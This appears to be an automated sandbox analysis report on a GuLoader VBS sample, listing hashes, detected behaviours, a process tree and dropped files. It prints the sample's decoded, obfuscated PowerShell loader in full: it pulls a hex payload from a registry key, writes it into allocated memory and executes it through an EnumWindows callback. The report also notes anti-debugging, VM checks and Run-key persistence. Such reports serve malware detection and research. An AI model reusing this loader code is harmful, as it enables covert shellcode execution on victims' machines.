Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25-12-2024 03:35

General

  • Target

    JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs

  • Size

    727KB

  • MD5

    99a444a2e45d6007e37fb0c2c25e49c4

  • SHA1

    7ab6b11b684243ae587b6eb037cabe98984792ff

  • SHA256

    724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3

  • SHA512

    7398994f927e22cd1bf868436c4645f368cf3439fe00dd836c10d8860ae22c73aa16f4ddd9c6f37053c326d65734d9e6ad1afe73955cc727c7c982b31f6ae69e

  • SSDEEP

    6144:7umfsxtdM+jbYG0XxnHVMYhRANfAD58OAFZ3/g5VCyh9IiwEw6IAl:uoQYhiNft+wErIe

Malware Config

Signatures

  • Guloader family
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# H y a e n o d o n t d e p u t e r e t h a m p e f r s   S u b s t i t u r m i s g r a d e   T m m e r f l a a d e r s s p a t t i n g u d s   A r i l e d l a d i f i e d t i l g a n g   G r u n d t o n e s m i t s u m a t a p r e c e n   o r g a n i s a t i o n e r n e s s   M e t h o l j u d e a n i n d o r d n i n g m o n o t y p   B e f o l k n i n g s s u n d h e d e n f o r u d b e   C a r a m e l i n p u t t o o m o n o p l o i   D r n i n g e r s a p s i d a l l   T a m p o n a d e n s t r i b   S o k k e f d d e r s u l a s t e l i g h e d s o v e r h o   B a r n a g t i g h e d e r n e c a g i e   L a n d s f o r e n i n g s n o    
 $ R u m f a r t s c e n t r e s v i r k 0   =   " N " + " t " + " A l l " + " o c a t e " + " V i r t " + " u a l " + " M e m " + " o r y "  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1  
 {  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t K e y b o a r d S t a t e ( i n t   v a r 1 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   R t l M o v e M e m o r y ( I n t P t r   S a m l e v e r s k e n s k r 1 , r e f   I n t 3 2   S a m l e v e r s k e n s k r 2 , i n t   S a m l e v e r s k e n s k r 3 ) ;  
  
 [ D l l I m p o r t ( " w i n m m . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   t i m e B e g i n P e r i o d ( i n t   v a r 1 ) ;  
 [ D l l I m p o r t ( " n t d l l . d l l " ,   E n t r y P o i n t = " $ R u m f a r t s c e n t r e s v i r k 0 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C o r e 1 ( i n t   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 6 , r e f   I n t 3 2   F o r f i l m e n e s r e k n o c k r e p r o d u c , i n t   S a m l e v e r s k e n s k r , r e f   I n t 3 2   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m , i n t   R u m f a r t s c e n t r e s v i r k , i n t   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 7 ) ;  
  
 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t I C M P r o f i l e ( i n t   v a r 1 , i n t   v a r 2 , i n t   v a r 3 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t S t r i n g T y p e E x ( i n t   v a r 1 , i n t   v a r 2 , i n t   v a r 3 , i n t   v a r 4 , i n t   v a r 5 ) ;  
  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   I s R e c t E m p t y ( i n t   v a r 1 ) ;  
  
  
  
 [ D l l I m p o r t ( " u s e r 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( u i n t   S a m l e v e r s k e n s k r 5 , i n t   S a m l e v e r s k e n s k r 6 ) ;  
  
  
 }  
 " @  
 # D e m u r s t e k n o l o g i s k e s n d e   M o t h e r l e s s h o t e l v r e l s e   Y a l l a e r u d e l e l i g t a   K v a r t e r r a p p o r t e r s s v e l n i n g   F i b e r g l a s s e t s f r i s k e r   T r s n i t s u n a s s o c i a t i v e c h o   P o s t p a t e l l a r t e   R a g t o p s k r m h a a n d t e r i n g e r n e t r l   S e m i p r o g r e s s i v e l y u   m a n d e t i m e r n e s l e z g y p s u   U n d e r m e n n e s k e b r a c t l e t t a p s t e r l y   C h a u c h a t r e v e r e n   L s e h a s t i g h e d e n s d v r g b i r k e s a b a n   S t e n r k e n e n a c c e s s i o n s e j a k u l a t i o   M i n n e s o t a b a s i l i   H u d f l e t n i n g e r n e s l i g h t n i n g p   N a t a l i t y r a t i o n a l i   B j r n e l a b m a s c u l i n e s n o   A f v i s e r n e s u n i n t r o d u c t o r y f o r   A r i a d n e t r a a d e s b l a n c h e r i n g e n   B r i b e r s t a n d a r d i s e   P r o p i t i o u s l y i n e x p r e s s c e n t   P o l l i n i f e r o u s t o   K a p e l p o s t s c u t e l l a i r r e s p o n s i b l e   S u p e r u r g e n t l y r e s u n d f e r i e g o   H e n n i n g s b e g l o b   T a r r e r a n g r e b s p u n k t s e k s   B u c h i t e p i l e r g r u t c h p l u m c o t s p y   q u a s s e x t r a t e l l u r i a n e l e c t r o d i a l   S m u g l e r e n s m a t r i p o t   u n s a w n p i e t e r s a n g i r i n h a b i t a t i o n   R i d s e n e h u n d e s v   S t r a f a f s o n e r s u i g e n n e m s k u e l i g      
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 = 0 ;  
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 9 = 1 0 4 8 5 7 6 ;  
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 8 = [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : C o r e 1 ( - 1 , [ r e f ] $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 , 0 , [ r e f ] $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 9 , 1 2 2 8 8 , 6 4 )  
 $ b r k d e l e n e s e f t e r g i v e t n = ( G e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ T a l t e s a f t e n b n n e n s p r m i e l a a n s c u " ) . U n s a l l y i n g r e b e l l i o n n o n e  
  
 $ U d t y d e t r o t h k o m e l o d   =   [ S y s t e m . B y t e [ ] ] : : C r e a t e I n s t a n c e ( [ S y s t e m . B y t e ] , $ b r k d e l e n e s e f t e r g i v e t n . L e n g t h   /   2 )  
  
  
  
 F o r ( $ i = 0 ;   $ i   - l t   $ b r k d e l e n e s e f t e r g i v e t n . L e n g t h ;   $ i + = 2 )  
 	 {  
                 $ U d t y d e t r o t h k o m e l o d [ $ i / 2 ]   =   [ c o n v e r t ] : : T o B y t e ( $ b r k d e l e n e s e f t e r g i v e t n . S u b s t r i n g ( $ i ,   2 ) ,   1 6 )  
         }  
  
  
 f o r ( $ K e g l e f l a d e r n e e t h n o g r a p h = 0 ;   $ K e g l e f l a d e r n e e t h n o g r a p h   - l t   $ U d t y d e t r o t h k o m e l o d . c o u n t   ;   $ K e g l e f l a d e r n e e t h n o g r a p h + + )  
 {  
 	  
 [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : R t l M o v e M e m o r y ( $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 + $ K e g l e f l a d e r n e e t h n o g r a p h , [ r e f ] $ U d t y d e t r o t h k o m e l o d [ $ K e g l e f l a d e r n e e t h n o g r a p h ] , 1 )  
  
 }  
 [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : E n u m W i n d o w s ( $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 ,   0 )  
  
 "
      2⤵
      • Checks QEMU agent file
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2272
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-piv1c4-.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2044
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DC0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8DBF.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2916
      • C:\Program Files (x86)\internet explorer\ieinstal.exe
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        3⤵
        • Checks QEMU agent file
        • Adds Run key to start application
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2940

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\-piv1c4-.dll

    Filesize

    4KB

    MD5

    093f30cf544785834cc09a55743038c6

    SHA1

    af69656ad1b049a2a13cfe8e23874e9cd2325c9b

    SHA256

    53c7931ad555b2dc8da3e44a15a0964c19a996b7443471863ec57f333eb06580

    SHA512

    fe1d819e26c3a8baaa83983c30b477dec2e3c8b47c1cabe5032b3b53b3b1d7532af51fe4785cc2c684f106dfdc5da3b5598f8b8b7c63a1923520511541765e6d

  • C:\Users\Admin\AppData\Local\Temp\-piv1c4-.pdb

    Filesize

    7KB

    MD5

    dd5e50179ff04c34430f4a8440a6de61

    SHA1

    be6f3cb2ed8fb1585e6abfe92e758fccc7963933

    SHA256

    a2c2dd1e98ab99d9efbbaf398512306eb292a226ae1d4a104c79037c4aa18ec7

    SHA512

    7a1b6d9b6ecb5640921df19707bf006a268c9df8c1db55240b6336dba31184091218f970495b652e99e9b192dfa7b2b0b9c968e2ad0bd0ef2df4f7f3825bcfca

  • C:\Users\Admin\AppData\Local\Temp\RES8DC0.tmp

    Filesize

    1KB

    MD5

    531a1b1cdc1c1e148d9810a18acf6e49

    SHA1

    d1c524c63fcb01926defbae55f3b1b46f80f376e

    SHA256

    aa30f7ed3714609752f136c3da9e7d85f30a77ee1beb6aeff8fb5cab11d04c86

    SHA512

    95c29d0c0e10017a26eee689cc18d38b98ba8876abc0ff3a5ef02df78110e31b3f90a2a23a67520f26dd6d8f671e3528db4143da77109ebd1692373ab104be22

  • \??\c:\Users\Admin\AppData\Local\Temp\-piv1c4-.0.cs

    Filesize

    1KB

    MD5

    fd01bdbcce0a28e44e23fd48d27fecb3

    SHA1

    e601c783d5852bec3efdb1c2bac13b5e0c65f2a2

    SHA256

    c0fef30f1c5beaa723a8f20f8f728ae7f5241cffed7ba54e792b32500ae7d20d

    SHA512

    0a2978a4a22b75f871b70f7e86cfc8d92b9b314f86396ceb995f254d16ad85303fa0a6236a2e2308b23fbe16edbfbe8c9ac5b63d2daeb171d1126e97a6b21a69

  • \??\c:\Users\Admin\AppData\Local\Temp\-piv1c4-.cmdline

    Filesize

    309B

    MD5

    d311d3395048f6a99df2aababe71409b

    SHA1

    030c8b0cd433212fbc0a5ba135528da4e7c23930

    SHA256

    698545b2af115632dc859a7418eeaab9047a5f49e0ec4c0fd4a8bc7cf919e6bc

    SHA512

    aecdf5d3e167940d6bd0b1ab17e7aa78581988f56a1ddbd5a5f6178d12b65793e0a6f38a71118ce7a4525a18cb2d845751bd928948b57a4e0eac7d670abd1bfe

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC8DBF.tmp

    Filesize

    652B

    MD5

    abf2f0e0e03ed84fe3dced9afeca220e

    SHA1

    7b27beec5972f903e774d3fb3f55599c8f900167

    SHA256

    c8dadf21dd3190b7ef56efc219a132c4f49fd5b8f14025a76b32271312beebb3

    SHA512

    29ab220f59d1e3f27ce6836be679d20dbcc8a8ebeb22103e9265b5c2cb96497d55ead052f02fea2dab85ae6f2552a8dd13fcf1631b1d0c5015d368177d87fa1e

  • memory/2272-4-0x0000000073AE0000-0x000000007408B000-memory.dmp

    Filesize

    5.7MB

  • memory/2272-2-0x0000000073AE1000-0x0000000073AE2000-memory.dmp

    Filesize

    4KB

  • memory/2272-5-0x0000000073AE0000-0x000000007408B000-memory.dmp

    Filesize

    5.7MB

  • memory/2272-6-0x0000000073AE0000-0x000000007408B000-memory.dmp

    Filesize

    5.7MB

  • memory/2272-3-0x0000000073AE0000-0x000000007408B000-memory.dmp

    Filesize

    5.7MB

  • memory/2272-22-0x0000000073AE0000-0x000000007408B000-memory.dmp

    Filesize

    5.7MB

  • memory/2940-23-0x00000000000D0000-0x00000000001D0000-memory.dmp

    Filesize

    1024KB

  • memory/2940-40-0x0000000000400000-0x0000000000615000-memory.dmp

    Filesize

    2.1MB

  • memory/2940-44-0x00000000000D0000-0x00000000001D0000-memory.dmp

    Filesize

    1024KB

  • memory/2940-45-0x00000000000D0000-0x00000000001D0000-memory.dmp

    Filesize

    1024KB